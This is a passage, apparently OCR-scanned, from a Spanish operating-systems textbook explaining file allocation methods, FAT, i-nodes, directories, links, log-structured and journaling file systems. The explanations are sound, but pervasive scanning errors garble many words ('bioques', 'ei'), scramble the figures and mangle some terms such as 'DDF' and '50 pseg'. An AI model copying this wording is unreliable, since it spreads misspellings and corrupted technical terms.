50 bioques consecutivos. Con bioques de 2 KB, se ie asignarían 25 bioques consecutivos. 
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En la figura 4-10(a) podemos ver un ejemplo de asignación de almacenamiento contigua. Aquí 
se muestran los primeros 40 bloques de disco, empezando con el bloque 0, a la izquierda. AI prin¬ 
cipio el disco estaba vacío, después se escribió un archivo A de cuatro bloques de longitud al dis¬ 
co, empezando desde el principio (bloque 0). Posteriormente se escribió un archivo de seis bloques 
llamado B, empezando justo después del archivo A. 

Observe que cada archivo empieza al inicio de un nuevo bloque, por lo que si el archivo A fue¬ 
ra realmente de bloques, se desperdiciaría algo de espacio al final del último bloque. En la fi¬ 
gura se muestra un total de siete archivos, cada uno empezando en el bloque que va después del 
final del archivo anterior. Se utiliza sombreado sólo para facilitar la distinción de cada archivo. No 
tiene un significado real en términos de almacenamiento. 


Archivo A Archivo C Archivo E Archivo G 

(4 bioques) (6 bioques) (12 bioques) (3 bioques) 


. 


Archivo B 
(3 bioques) 


Archivo D 
(5 bioques) 

(a) 


Archivo F 
(6 bioques) 


(Archivo A) (Archivo C) 


(Archivo E) 


(Archivo G) 


Archivo B 5 bioques iibres 6 bioques iibres 

(b) 

Figura 4-10. (a) Asignación contigua de espacio de disco para siete archivos, (b) El 
estado del disco después de haber removido los archivos D y F. 


La asignación de espacio en disco contiguo tiene dos ventajas significativas. En primer lugar 
es simple de implementar, ya que llevar un registro de la ubicación de los bloques de un archivo se 
reduce a recordar dos números: la dirección de disco del primer bloque y el número de bloques en 
el archivo. Dado el número del primer bloque, se puede encontrar el número de cualquier otro blo¬ 
que con una simple suma. 

En segundo lugar, el rendimiento de lectura es excelente debido a que el archivo completo se 
puede leer del disco en una sola operación. Sólo se necesita una búsqueda (para el primer bloque). 
Después de eso, no son necesarias más búsquedas ni retrasos por rotación, por lo que los datos lle¬ 
gan con el ancho de banda completa del disco. Por ende, la asignación contigua es simple de im¬ 
plementar y tiene un alto rendimiento. 

Por desgracia, la asignación contigua también tiene una desventaja ligeramente significante: con el 
transcurso del tiempo, los discos se fragmentan. Para ver cómo ocurre esto, examine la figura 4-10(b). 
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Aquí se han eliminado dos archivos, D y F. Cuando se quita un archivo, sus bloques se liberan natural¬ 
mente, dejando una serie de bloques libres en el disco. El disco no se compacta al momento para quitar 
el hueco, ya que eso implicaría tener que copiar todos los bloques que van después del hueco, que po¬ 
drían ser millones. Como resultado, el disco al final consiste de archivos y huecos, como se ilustra en la 
figura. 

Al principio esta fragmentación no es un problema, ya que cada nuevo archivo se puede escri¬ 
bir al final del disco, después del anterior. Sin embargo, en un momento dado el disco se llenará y 
será necesario compactarlo, lo cual es en extremo costoso o habrá que reutilizar el espacio libre de 
los huecos. Para reutilizar el espacio hay que mantener una lista de huecos, lo cual se puede hacer. 
Sin embargo, cuando se cree un nuevo archivo será necesario conocer su tamaño final para poder 
elegir un hueco del tamaño correcto y colocarlo. 

Imagine las consecuencias de tal diseño. El usuario empieza un editor de texto o procesador de 
palabras para poder escribir un documento. Lo primero que pide el programa es cuántos bytes ten¬ 
drá el documento final. Esta pregunta se debe responder o el programa no continuará. Si el núme¬ 
ro dado finalmente es demasiado pequeño, el programa tiene que terminar prematuramente debido 
a que el hueco de disco está lleno y no hay lugar para colocar el resto del archivo. Si el usuario tra¬ 
ta de evitar este problema al proporcionar un número demasiado grande como tamaño final, por de¬ 
cir 100 M B, tal vez el editor no pueda encontrar un hueco tan grande y anuncie que el archivo no 
se puede crear. Desde luego que el usuario tiene la libertad de iniciar de nuevo el programa dicien¬ 
do 50 M B esta vez y así en lo sucesivo hasta que se encuentre un hueco adecuado. Aún así, no es 
probable que este esquema haga que los usuarios estén felices. 

Sin embargo, hay una situación en la que es factible la asignación contigua y de hecho, se uti¬ 
liza ampliamente: en los CD-ROM s. Aquí todos los tamaños délos archivos se conocen de antema¬ 
no y nunca cambiarán durante el uso subsiguiente del sistema de archivos del CD-ROM. Más 
adelante en este capítulo estudiaremos el sistema de archivos del CD-ROM más común. 

La situación con los DVDs es un poco más complicada. En principio, una película de 90 mi¬ 
nutos se podría decodificar como un solo archivo de una longitud aproximada de 4.5 GB, pero el 
sistema de archivos utilizado, conocido como DDF (U niversal Disk Format, Formato de disco uni¬ 
versal), utiliza un número de 30 bits para representar la longitud de un archivo, limitando el tama¬ 
ño de los archivos a 1 GB. Como consecuencia, las películas en DV D se almacenan generalmente 
como tres o cuatro archivos de 1 GB, cada uno de los cuales es contiguo. Estas partes físicas del 
único archivo lógico (la película) se conocen como fragmentos. 

Como mencionamos en el capítulo 1, la historia se repite a menudo en las ciencias compu- 
tacionales, a medida que van surgiendo nuevas generaciones de tecnología. En realidad, la asig¬ 
nación contigua se utilizó en los sistemas de archivos en discos magnéticos hace años, debido a 
su simpleza y alto rendimiento (la amabilidad con el usuario no contaba mucho entonces). Des¬ 
pués se descartó la idea debido a la molestia de tener que especificar el tamaño final del archivo 
al momento de su creación. Pero con la llegada de los CD-ROMs, los DVDs y otros medios óp¬ 
ticos en los que se puede escribir sólo una vez, los archivos contiguos son repentinamente una 
buena idea otra vez. Por lo tanto, es importante estudiar los antiguos sistemas y las ideas, que 
conceptual mente eran claras y simples, debido a que pueden aplicarse a los sistemas futuros en 
formas sorprendentes. 


SECCION 4.3 


IMPLEMENTACION DE SISTEMAS DEARCHIVOS 


277 


Asignación de iista eniazada (iigada) 

El segundo método para almacenar archivos es mantener cada uno como una lista enlazada de blo¬ 
ques de disco, como se muestra en la figura 4-11. La primera palabra de cada bloque se utiliza co¬ 
mo apuntador al siguiente. El resto del bloque es para los datos. 


Archivo A 



Bloque 4 7 2 10 12 

físico 


Archivo B 



Bloque 6 3 11 14 

físico 

Figura 4-11. Almacenamiento de un archivo como una lista enlazada de bloques de 
disco. 


A diferencia de la asignación contigua, en este método se puede utilizar cada bloque del disco. 
No se pierde espacio debido a la fragmentación del disco (excepto por la fragmentación interna en 
el último bloque). Además, para la entrada del directorio sólo le basta con almacenar la dirección 
de disco del primer bloque. El resto se puede encontrar a partir de ella. 

Por otro lado, aunque la lectura secuencial un archivo es directa, el acceso aleatorio es en ex¬ 
tremo lento. Para llegar al bloque n, el sistema operativo tiene que empezar desde el principio 
y leer los n - 1 bloques anteriores, uno a la vez. Es clarto que tantas lecturas serán demasiado 
lentas. 

Además, la cantidad de almacenamiento de datos en un bloque ya no es una potencia de dos, 
debido a que el apuntador ocupa unos cuantos bytes. A unque no es fatal, tener un tamaño peculiar 
es menos eficiente debido a que muchos programas leen y escriben en bloques, cuyo tamaño es una 
potencia de dos. Con los primeros bytes de cada bloque ocupados por un apuntador al siguiente blo¬ 
que, leer el tamaño del bloque completo requiere adquirir y concatenar información de dos bloques 
de disco, lo cual genera un gasto adicional de procesamiento debido a la copia. 

Asignación de lista enlazada utilizando una tabla en memoria 

Ambas desventajas de la asignación de lista enlazada se pueden eliminar si tomamos la palabra del 
apuntador de cada bloque de disco y la colocamos en una tabla en memoria. La figura 4-12 mués- 
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tra cuál es la apariencia de ia tabia para ei ejempio de ia figura 4-11. En ambas figuras tenemos dos 
archivos. Ei archivo A utiiiza ios bioques de disco 4, 7, 2, 10 y 12, en ese orden y ei archivo B uti- 
iiza ios bioques de disco 6, 3,11 y 14, en ese orden. Utiiizando ia tabia de ia figura 4-12, podemos 
empezar con ei bioque 4 y seguir toda ia cadena hasta ei finai. Lo mismo se puede hacer empezan¬ 
do con ei bioque 6. Ambas cadenas se terminan con un marcador especiai (por ejempio, -1) que 
no sea un número de bioque váiido. Dicha tabia en memoria principai se conoce como FAT (Fiie 
Aiiocation Tabie, Tabia de asignación de archivos). 

Bloque 
físico 

0 

1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

13 

14 

15 


Figura 4-12. A signación de lista enlazada que utiliza una tabla de asignación de archi¬ 
vos en la memoria principal. 




10 

11 

7 


3 

2 



12 

14 

-1 


-1 



EI archivo A empieza aquí 
EI archivo B empieza aquí 


Bloque sin utilizar 


Utilizando esta organización, el bloque completo está disponible para los datos. Además, el ac¬ 
ceso aleatorio es mucho más sencillo. Aunque aún se debe seguir la cadena para encontrar un des¬ 
plazamiento dado dentro del archivo, la cadena está completamente en memoria y se puede seguir 
sin necesidad de hacer referencias al disco. Al igual que el método anterior, la entrada de directorio 
necesita mantener sólo un entero (el número de bloque inicial) y aún así puede localizar todos los 
bloques, sin importar qué tan grande sea el archivo. 

L a principal desventaja de este método es que toda la tabla debe estar en memoria todo el tiem¬ 
po para que funcione. Con un disco de 200 GB y un tamaño de bloque de 1 KB, la tabla necesita 
200 millones de entradas, una para cada uno de los 200 millones de bloques de disco. Cada entra¬ 
da debe tener un mínimo de 3 bytes. Para que la búsqueda sea rápida, deben tener 4 bytes. Así, la 
tabla ocupará 600 M B u 800 M B de memoria principal todo el tiempo, dependiendo de si el siste¬ 
ma está optimizado para espacio o tiempo. Esto no es muy práctico. Es claro que la idea de la FAT 
no se escala muy bien en los discos grandes. 
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Nodos-i 

Nuestro último método para llevar un registro de qué bloques pertenecen a cuál archivo es asociar 
con cada archivo una estructura de datos conocida como nodo-i (nodo-índice), la cual lista los atri¬ 
butos y las direcciones de disco de los bloques del archivo. En la figura 4-13 se muestra un ejem¬ 
plo simple. Dado el nodo-i, entonces es posible encontrar todos los bloques del archivo. La gran 
ventaja de este esquema, en comparación con los archivos vinculados que utilizan una tabla en me¬ 
moria, es que el nodo-i necesita estar en memoria sólo cuando está abierto el archivo correspon¬ 
diente. Si cada nodo-i ocupa n bytes y puede haber un máximo de k archivos abiertos a la vez, la 
memoria total ocupada por el arreglo que contiene los nodos-i para los archivos abiertos es de sólo 
kn bytes. Sólo hay que reservar este espacio por adelantado. 


Atributos de archivo 


Dirección dei bioque de disco 0 


Dirección dei bioque de disco 1 


Dirección dei bioque de disco 2 


Dirección dei bioque de disco 3 


Dirección dei bioque de disco 4 


Dirección dei bioque de disco 5 


Dirección dei bioque de disco 6 


Dirección dei bioque de disco 7 

Dirección dei bioque de 
_ apuntadores _ 


Bioque de disco 
que contiene 
direcciones de 
disco adicionaies 


Figura 4-13. U n nodo-i de ejemplo. 

Por lo general, este arreglo es mucho más pequeño que el espacio ocupado por la tabla de ar¬ 
chivos descrita en la sección anterior. La razón es simple: la tabla para contener la lista enlazada 
de todos los bloques de disco es proporcional en tamaño al disco en sí. Si el disco tiene n bloques, 
la tabla necesita n entradas. A medida que aumenta el tamaño de los discos, esta tabla aumenta li¬ 
nealmente con ellos. En contraste, el esquema del nodo-i requiere un arreglo en memoria cuyo ta¬ 
maño sea proporcional al número máximo de archivos que pueden estar abiertos a la vez. No 
importa si el disco es de 10 GB, de 100 GB ó de 1000 GB. 

Un problema con los nodos-i es que si cada uno tiene espacio para un número fijo de direccio¬ 
nes de disco, ¿qué ocurre cuando un archivo crece más allá de este límite? Una solución es reser- 
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var la última dirección de disco no para un bloque de datos, sino para la dirección de un bloque que 
contenga más direcciones de bloques de disco, como se muestra en la figura 4-13. Algo aun más 
avanzado sería que dos o más de esos bloques contuvieran direcciones de disco o incluso bloques 
de disco apuntando a otros bloques de disco llenos de direcciones. M ás adelante volveremos a ver 
los nodos-i, al estudiar UNIX. 

4.3.3 Implementación de directorios 

Antes de poder leer un archivo, éste debe abrirse. Cuando se abre un archivo, el sistema operativo 
utiliza el nombre de la ruta suministrado por el usuario para localizar la entrada de directorio. Esta 
entrada provee la información necesaria para encontrar los bloques de disco. Dependiendo del sis¬ 
tema, esta información puede serla dirección de disco de todo el archivo (con asignación contigua), 
el número del primer bloque (ambos esquemas de lista enlazada ) o el número del nodo-i. En todos 
los casos, la función principal del sistema de directorios es asociar el nombreASCII del archivo a 
la información necesaria para localizar los datos. 

Una cuestión muy relacionada es dónde deben almacenarse los atributos. Cada sistema de ar¬ 
chivos mantiene atributos de archivo, como el propietario y la hora de creación de cada archivo, de¬ 
biendo almacenarse en alguna parte. Una posibilidad obvia es almacenarlos directamente en la 
entrada de directorio. M uchos sistemas hacen eso. Esta opción se muestra en la figura 4-14(a). En 
este diseño simple, un directorio consiste en una lista de entradas de tamaño fijo, una por archivo, 
que contienen un nombre de archivo (de longitud fija), una estructura de los atributos del archivo y 
una o más direcciones de disco (hasta cierto máximo) que indique en dónde se encuentran los blo¬ 
ques de disco. 


juegos 

atributos 

correo 

atributos 

noticias 

atributos 

trabajo 

atributos 


(a) 



Estructura de 
datos que 
contiene los 
atributos 


Figura 4-14. (a) U n directorio simple que contiene entradas de tamaño fijo, con las di¬ 
recciones de disco y los atributos en la entrada de directorio, (b) U n directorio en el 
que cada entrada sólo hace referencia a un nodo-i. 


Para los sistemas que utilizan nodos-i, existe otra posibilidad para almacenar los atributos en 
los nodos-i, en vez de hacerlo en las entradas de directorio. En ese caso, la entrada de directorio 
puede ser más corta: sólo un nombre de archivo y un número de nodo-i. Este método se ilustra en 
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la figura 4-14(b). Como veremos más adelante, este método tiene ciertas ventajas sobre el método 
de colocarlos en la entrada de directorio. Los dos esquemas que se muestran en la figura 4-14 co¬ 
rresponden a Windows y UNIX, respectivamente, como veremos más adelante. 

Hasta ahora hemos hecho la suposición deque los archivos tienen nombres cortos con longitud 
fija. En M S-DOS, los archivos tienen un nombre base de 1 a 8 caracteres y una extensión opcional 
de 1 a 3 caracteres. En UNIX Versión 7, los nombres de los archivos eran de 1 a 14 caracteres, in¬ 
cluyendo cualquier extensión. Sin embargo, casi todos los sistemas operativos modernos aceptan 
nombres de archivos más largos, con longitud variable. ¿Cómo se pueden impiementar éstos? 

El esquema más simple es establecer un límite en la longitud del nombre de archivo, que por 
lo general es de 255 caracteres y después utilizar uno de los diseños de la figura 4-14 con 255 ca¬ 
racteres reservados para cada nombre de archivo. Este esquema es simple, pero desperdicia mucho 
espacio de directorio, ya que pocos archivos tienen nombres tan largos. Por cuestiones de eficien¬ 
cia, es deseable una estructura distinta. 

Una alternativa es renunciar a la idea de que todas las entradas de directorio sean del mismo 
tamaño. Con este método, cada entrada de directorio contiene una porción fija, que por lo general 
empieza con la longitud de la entrada y después va seguida de datos con un formato fijo, que co¬ 
múnmente incluyen el propietario, la hora de creación, información de protección y demás atribu¬ 
tos. Este encabezado de longitud fija va seguido por el nombre del archivo, sin importar la longitud 
que tenga, como se muestra en la figura 4-15(a) en formato big-endian (por ejemplo, SPARC). En 
este ejemplo tenemos tres archivos, sexto-proyecto, personaje y ave. Cada nombre de archivo se ter¬ 
mina con un carácter especial (por lo general 0), el cual se representa en la figura mediante un cua¬ 
dro con una cruz. Para permitir que cada entrada de directorio empiece en un límite de palabra, cada 
nombre de archivo se rellena a un número entero de palabras, que se muestran como cuadros som¬ 
breados en la figura. 

U na desventaj a de este método es que cuando se el i mi na un archivo, en su I ugar queda un hue¬ 
co de tamaño variable dentro del directorio, dentro del cual el siguiente archivo a introducir pue¬ 
de que no quepa. Este problema es el mismo que vimos con los archivos de disco contiguos, sólo 
que ahora es factible compactar el directorio ya que se encuentra por completo en la memoria. Otro 
problema es que una sola entrada en el directorio puede abarcar varias páginas, por lo que puede 
ocurrir un fallo de páginas al leer el nombre de un archivo. 

Otra manera de manejar los nombres de longitud variable es hacer que las mismas entradas de 
directorio sean de longitud fija y mantener los nombres de los archivos juntos en un heap al final 
del directorio, como se muestra en la figura 4-15(b). Este método tiene la ventaja de que cuando se 
remueva una entrada, el siguiente archivo a introducir siempre cabrá ahí. Desde luego que el heap 
se debe administrar y todavía pueden ocurrir fallos de página al procesar los nombres de los archi¬ 
vos. U na pequeña ganancia aquí es que ya no hay una verdadera necesidad de que los nombres de 
archivos empiecen en límites de palabras, por lo que no se necesitan caracteres de relleno después 
de los nombres de archivos en la figura 4-15(b), como se hizo en la figura 4-15(a). 

En todos los diseños mostrados hasta ahora se realizan búsquedas lineales en los directorios 
de principio a fin cuando hay que buscar el nombre de un archivo. Para los directorios en extremo 
largos, la búsqueda lineal puede ser lenta. Una manera de acelerar la búsqueda es utilizar una tabla 
de hash en cada directorio. Llamemos n al tamaño de la tabla. Para introducir un nombre de archivo, 
se codifica en hash con un valor entre 0 y n - 1, por ejemplo, dividiéndolo entre n y tomando el 
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Figura 4-15. Dos maneras de manejar nombres de archivos largos en un directorio, 
(a) En línea, (b) En un heap. 


residuo. De manera alternativa, las palabras que componen el nombre del archivo se pueden sumar 
y esta cantidad se divide entre n, o algo similar. 

De cualquier forma, se inspecciona la entrada de la tabla correspondiente al código de hash. Si 
no está en uso, un apuntador se coloca ahí a la entrada del archivo. Las entradas de archivos siguen 
la tabla de hash. Si esa ranura ya está en uso, se construye una lista enlazada, que encabeza la en¬ 
trada de la tabla y que encadena todas las entradas con el mismo valor de hash. 

Para buscar un archivo se sigue el mismo procedimiento. El nombre de archivo se codifica en 
hash para seleccionar una entrada en la tabla hash. Todas las entradas en la cadena que encabeza esa 
ranura se verifican para ver si el nombre de archivo está presente. Si el nombre no se encuentra en 
la cadena, el archivo no está presente en el directorio. 

El uso de una tabla de hash tiene la ventaja de que la búsqueda es mucho más rápida, pero la 
desventaja de una administración más compleja. En realidad es sólo un candidato serio en los siste¬ 
mas donde se espera que los directorios rutinariamente contengan cientos o miles de archivos. 

Una manera distinta de acelerar la búsqueda en directorios extensos es colocar en caché los 
resultados de las búsquedas. A ntes de iniciar una búsqueda, primero se realiza una verificación para 
ver si el nombre del archivo está en la caché. De ser así, se puede localizar de inmediato. Desde lue¬ 
go, el uso de la caché sólo funciona si un número relativamente pequeño de archivos abarcan la ma¬ 
yoría de las búsquedas. 
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4.3.4 Archivos compartidos 

Cuando hay varios usuarios trabajando en conjunto en un proyecto, a menudo necesitan compartir 
archivos. Como resuitado, con frecuencia es conveniente que aparezca un archivo compartido en 
forma simuitánea en distintos directorios que pertenezcan a distintos usuarios. La figura 4-16 mues¬ 
tra ei sistema de archivos de ia figura 4-7 de nuevo, sóio que con uno de ios archivos de C ahora 
presentes en uno de ios directorios de B también. La conexión entre ei directorio de B y ei archivo 
compartido se conoce como un vínculo (i iga). Ei sistema de archivos en sí es ahora un Gráfico ací¬ 
clico dirigido (Directed Acyclic Graph, DAG) en vez de un árboi. 



Figura 4-16. Sistema de archivos que contiene un archivo compartido. 

Compartir archivos es conveniente, pero también introduce ciertos probiemas. Para empezar, si 
ios directorios en reaiidad contienen direcciones de disco, entonces habrá que reaiizar una copia de 
ias direcciones de disco en ei directorio de B cuando se iigue ei archivo. Si B o C agregan poste¬ 
riormente ai archivo, ios nuevos bioques se iistarán sóio en ei directorio dei usuario que agregó ios 
datos. Los cambios no estarán visibies para ei otro usuario, con io cuai fracasa ei propósito de ia 
compartición. 

Este probiema se puede resoiver de dos formas. En ia primera soiución, ios bioques de disco 
no se iistan en ios directorios, sino en una pequeña estructura de datos asociada con ei archivo en 
sí. Entonces, ios directorios apuntarían sóio a ia pequeña estructura de datos. Éste es ei esquema que 
se utiiiza en UNIX (donde la pequeña estructura de datos es el nodo-i). 

En la segunda solución, B se vincula a uno de los archivos de C haciendo que el sistema cree 
un archivo, de tipo LINK e introduciendo ese archivo en el directorio de B. El nuevo archivo con¬ 
tiene sólo el nombre de la ruta del archivo al cual está vinculado. Cuando B lee del archivo vincu¬ 
lado, el sistema operativo ve que el archivo del que se están leyendo datos es de tipo LINK, busca 
el nombre del archivo y lee el archivo. A este esquema se le conoce como vínculo simbólico (liga 
simbólica), para contrastarlo con el tradicional vínculo (duro). 
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Cada uno de estos métodos tiene sus desventajas. En el primer método, al momento en que B 
se vincula al archivo compartido, el nodo-i registra al propietario del archivo como C. Al crear un 
vínculo no se cambia la propiedad (vea la figura 4-17), sino incrementa la cuenta de vínculos en el 
nodo-i, por lo que el sistema sabe cuántas entradas de directorio actualmente apuntan al archivo. 


Directorio de C Directorio de B Directorio de C Directorio de B 



O O O 

(a) (b) (c) 


Figura 4-17. (a) Situación previa a la vinculación, (b) Después de crear el vínculo, 
(c) Después de que el propietario original elimina el archivo. 


Si C posteriormente trata de eliminar el archivo, el sistema se enfrenta a un problema. Si eli¬ 
mina el archivo y limpia el nodo-i, B tendrá una entrada de directorio que apunte a un nodo-i invá¬ 
lido. Si el nodo-i se reasigna más tarde a otro archivo, el vínculo deB apuntará al archivo incorrecto. 
El sistema puede ver de la cuenta en el nodo-i que el archivo sigue todavía en uso, pero no hay una 
manera sencilla de que encuentre todas las entradas de directorio para el archivo, para que pueda 
borrarlas. Los apuntadores a los directorios no se pueden almacenar en el nodo-i, debido a que pue¬ 
de haber un número ilimitado de directorios. 

Lo único por hacer es eliminar la entrada de directorio de C, pero dejar el nodo-i intacto, con 
la cuenta establecida en 1, como se muestra en la figura 4-17(c). Ahora tenemos una situación en la 
que B es el único usuario que tiene una entrada de directorio para un archivo que pertenece a C. Si 
el sistema realiza la contabilidad o tiene cuotas, seguirá cobrando a C por el archivo hasta que B de¬ 
cida eliminarlo, si acaso lo hace, momento en el cual la cuenta será 0 y el archivo se eliminará. 

Con los vínculos simbólicos no se produce este problema, debido a que sólo el verdadero pro¬ 
pietario tiene un apuntador al nodo-i. Los usuarios que han creado vínculos al archivo sólo tienen 
nombres de ruta, no apuntadoras a nodos-i. Cuando el propietario elimina el archivo, éste se des¬ 
truye. Los intentos posteriores por utilizar el archivo vía un vínculo simbólico fallarán cuando el 
sistema no pueda localizar el archivo. Al eliminar un vínculo simbólico, el archivo no se ve afec¬ 
tado. 

El problema con los vínculos simbólicos es el gasto adicional de procesamiento requerido. Se 
debe leer el archivo que contiene la ruta, después ésta se debe analizar sintácticamente y seguir, 
componente por componente, hasta llegar al nodo-i. Toda esta actividad puede requerir una canti¬ 
dad considerable de accesos adicionales al disco. Además, se necesita un nodo-i adicional para ca¬ 
da vínculo simbólico, al igual que un bloque de disco adicional para almacenar la ruta, aunque si el 
nombre de la ruta es corto, el sistema podría almacenarlo en el mismo nodo-i, como un tipo de 
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optimización. Los víncuios simbóiicos tienen ia ventaja de que se pueden utiiizar para vincuiar ar¬ 
chivos en máquinas dondequiera en todo ei mundo, con sóio proporcionar ia dirección de red de ia 
máquina donde reside ei archivo, además de su ruta en esa máquina. 

También hay otro probiema que introducen ios víncuios, ya sean simbóiicos o de cuaiquier otro 
tipo. Cuando se permiten ios víncuios, ios archivos pueden tener dos o más rutas. Los programas, que 
empiezan en un directorio dado, encontrando todos ios archivos en ese directorio y en sus subdirecto¬ 
rios, iocaiizarán un archivo vincuiado varias veces. Por ejempio, un programa que vacía todos ios ar¬ 
chivos en un directorio y sus subdirectorios en una cinta, podría reaiizar varias copias de un archivo 
vincuiado. Lo que es más, si ia cinta seieeen otra máquina, a menos que ei programa de vaciado sea 
inteiigente, ei archivo vincuiado se copiará dos veces en ei disco, en vez de ser vincuiado. 

4.3.5 Sistemas de archivos estructurados por registro 

Los cambios en ia tecnoiogía están ejerciendo presión sobre ios sistemas de archivos actuaies. En 
especiai, ias CPUs se hacen más veioces, ios discos se están haciendo más grandes y baratos (pero 
no mucho más rápidos) y ias memorias están aumentando su tamaño en forma exponenciai. Ei úni¬ 
co parámetro que no está teniendo grandes avances es ei tiempo de búsqueda de disco. La combi¬ 
nación de estos factores indica que un cueiio de boteiia de funcionamiento está creciendo en 
muchos sistemas de archivos. Las investigaciones reaiizadas en Berkeiey trataron de aiiviar este 
probiema ai diseñaron tipo de sistema de archivos compietamente nuevo, liamado LFS (Log-struc- 
tured Fiie System, Sistema de archivos estructurado por registro). En esta sección describiremos 
brevemente cómo funciona LFS. Consuite un tratamiento más compieto en Rosenbium y Ouster- 
hout, 1991. 

La idea que impuisó ei diseño dei LFS es que, a medida que ias CPUs se vueiven más rápidas 
y ias memorias RAM se hacen más grandes, ias cachés de disco también se incrementan con rapi¬ 
dez. En consecuencia, ahora es posibie satisfacer una fracción muy considerabie de todas ias peti¬ 
ciones de iectura directamente dei caché dei sistema de archivos, sin necesitar accesos ai disco. De 
esta observación podemos deducir que en ei futuro ia mayoría de ios accesos ai disco serán escri¬ 
turas, por io que ei mecanismo de iectura adeiantada utiiizado en aigunos sistemas de archivos pa¬ 
ra obtener bioques antes de necesitados ya no gana mucho en rendimiento. 

Para empeorar ias cosas, en ia mayoría de ios sistemas de archivos ias escrituras se reaiizan en 
trozos muy pequeños. Las pequeñas escrituras son aitamente ineficientes, ya que una escritura en dis¬ 
co de 50 pseg a menudo va precedida de una búsqueda de 10 mseg y de un retraso rotacionai de 
4 mseg. Con estos parámetros, ia eficiencia en disco disminuye a una fracción de 1%. 

Para ver de dónde provienen todas ias pequeñas escrituras, considere ia creación de un nuevo 
archivo en un sistema UNIX. Para escribir este archivo, se deben escribir ei nodo-i para ei directo¬ 
rio, ei bioque de directorio, ei nodo-i para ei archivo y ei mismo archivo. Aunque estas escrituras 
se pueden retrasar, hacerio expone ai sistema de archivos a probiemas de consistencia graves si ocu¬ 
rre una faiia antes de reaiizar ias escrituras. Por esta razón, ias escrituras de nodos-i generaimente 
se reaiizan de inmediato. 

A partir de este razonamiento, ios diseñadores dei LFS decidieron reimpiementar ei sistema de 
archivos de UN IX a fin de que aicance ei ancho de banda compieto dei disco, inciuso ante una carga 
de trabajo que consistiera en gran parte de pequeñas escrituras ai azar. La idea básica es estructurar 
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todo el disco como un registro. De manera periódica, y cuando haya una necesidad especiai para 
eiio, todas ias escrituras pendientes que se coiocaron en un búfer en memoria se recoiectan en un 
soio segmento y se escriben en ei disco como un soio segmento continuo ai finai dei registro. Por 
io tanto, un soio segmento puede contener nodos-i, bioques de directorio y bioques de datos, todos 
mezciados entre sí. Ai inicio de cada segmento hay un resumen de segmento, que indica io que se 
puede encontrar en ei segmento. Si se puede hacer que ei segmento promedio tenga un tamaño apro¬ 
ximado a 1 M B, entonces se puede utiiizar casi todo ei ancho de banda dei disco. 

En este diseño, ios nodos-i aún existen y tienen i a misma estructura que en UNIX, pero ahora 
están esparcidos por todo ei registro, en vez de estar en una posición fija en ei disco. Sin embargo, 
cuando se iocaiiza un nodo-i, ia iocaiización de ios bioques se reaiiza de ia manera usuai. Desde 
iuego que ahora es mucho másdifícii buscaron nodo-i, ya que su dirección simpiementeno se pue¬ 
de caicuiar a partir de su número-i, como en UNIX. Para quesea posible encontrar nodos-i, se man¬ 
tiene un mapa de nodos-i, indexados por número-i. La entrada i en este mapa apunta al nodo-i i en 
el disco. El mapa se mantiene en el disco, pero también se coloca en la caché, de manera que las 
partes más utilizadas estén en memoria la mayor parte del tiempo. 

Para resumir lo que hemos dicho hasta ahora, al principio todas las escrituras se colocan en un 
búfer en memoria y periódicamente todas las escrituras en búfer se escriben en el disco en un solo 
segmento, al final del registro. Para abrir un archivo, ahora se utiliza el mapa para localizar el no- 
do-i para ese archivo. Una vez localizado el nodo-i, se pueden encontrar las direcciones de los blo¬ 
ques a partir de él. Todos los bloques estarán en segmentos, en alguna parte del registro. 

Si los discos fueran infinitamente extensos, la descripción anterior sería todo. Sin embargo, los 
discos reales son finitos, por lo que en un momento dado el registro ocupará todo el disco y en ese 
momento no se podrán escribir nuevos segmentos en el registro. Por fortuna muchos segmentos 
existentes pueden tener bloques que ya no sean necesarios: por ejemplo, si se sobrescribe un archi¬ 
vo, su nodo-i apuntará ahora a los nuevos bloques, pero los anteriores seguirán ocupando espacio 
en los segmentos escritos anteriormente. 

Para lidiar con este problema, el LES tiene un hilo limpiador que pasa su tiempo explorando 
el registro circularmente para compactarlo. Empieza leyendo el resumen del primer segmento en el 
registro para ver qué nodos-i y archivos están ahí. Después verifica el mapa de nodos-i actual para 
ver si los nodos-i están actualizados y si los bloques de archivos están todavía en uso. De no ser así, 
se descarta esa información. Los nodos-i y los bloques que aún están en uso van a la memoria pa¬ 
ra escribirse en el siguiente segmento. El segmento original se marca entonces como libre, de ma¬ 
nera que el registro pueda utilizarlo para nuevos datos. De esta manera, el limpiador se desplaza por 
el registro, removiendo los segmentos antiguos de la parte final y colocando cualquier información 
viva en la memoria para volver a escribirla en el siguiente segmento. En consecuencia, el disco es 
un gran búfer circular, donde el hilo escritor agrega nuevos segmentos al frente y el hilo limpiador 
remueve los segmentos viejos de la parte final. 

Llevar la contabilidad aquí no es trivial, ya que cuando un bloque de archivo se escribe de vuel¬ 
ta en un nuevo segmento, se debe localizar el nodo-i del archivo (en alguna parte del registro), ac¬ 
tualizarlo y colocarlo en memoria para escribirse en el siguiente segmento. El mapa de nodos-i debe 
entonces actualizarse para apuntar a la nueva copia. Sin embargo, es posible realizar la administra¬ 
ción y los resultados de rendimiento muestran que toda esta complejidad vale la pena. Las medicio¬ 
nes proporcionadas en los artículos antes citados muestran que LFS supera a UNIX en rendimiento 
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por una orden de magnitud en las escrituras pequeñas, mientras que tiene un rendimiento tan bue¬ 
no o mejor que U NIX para las lecturas o las escrituras extensas. 


4.3.6 Sistemas de archivos por bitácora 

Aunque los sistemas de archivos estructurados por registro son una idea interesante, no se utilizan 
ampliamente, debido en parte a su alta incompatibilidad con los sistemas de archivos existentes. Sin 
embargo, una de las ideas inherentes en ellos, la robustez frente a las fallas, se puede aplicar con fa¬ 
cilidad a sistemas de archivos más convencionales. La idea básica aquí es mantener un registro délo 
que va a realizar el sistema de archivos antes de hacerlo, porloque si el sistema falla antes de poder 
realizar su trabajo planeado, al momento de re-arrancar el sistema puede buscar en el registro para 
ver lo que estaba ocurriendo al momento de la falla y terminar el trabajo. Dichos sistemas de archi¬ 
vos, conocidos como sistemas de archivos por bitácora (j ournaling files system, j FS), se encuen¬ 
tran en uso actualmente. El sistema de archivos NTFS de M icrosoft, así como los sistemas ext3 y 
ReiserFS de Linux son todos por bitácora. A continuación daremos una breve introducción a este 
tema. 

Para ver la naturaleza del problema, considere una operación simple que ocurre todo el tiem¬ 
po: remover un archivo. Esta operación (en UNIX) requiere tres pasos: 

1. Quitar el archivo de su directorio. 

2. Liberar el nodo-i y pasarlo a la reserva de nodos-i libres. 

3. Devolver todos los bloques de disco a la reserva de bloques de disco libres. 

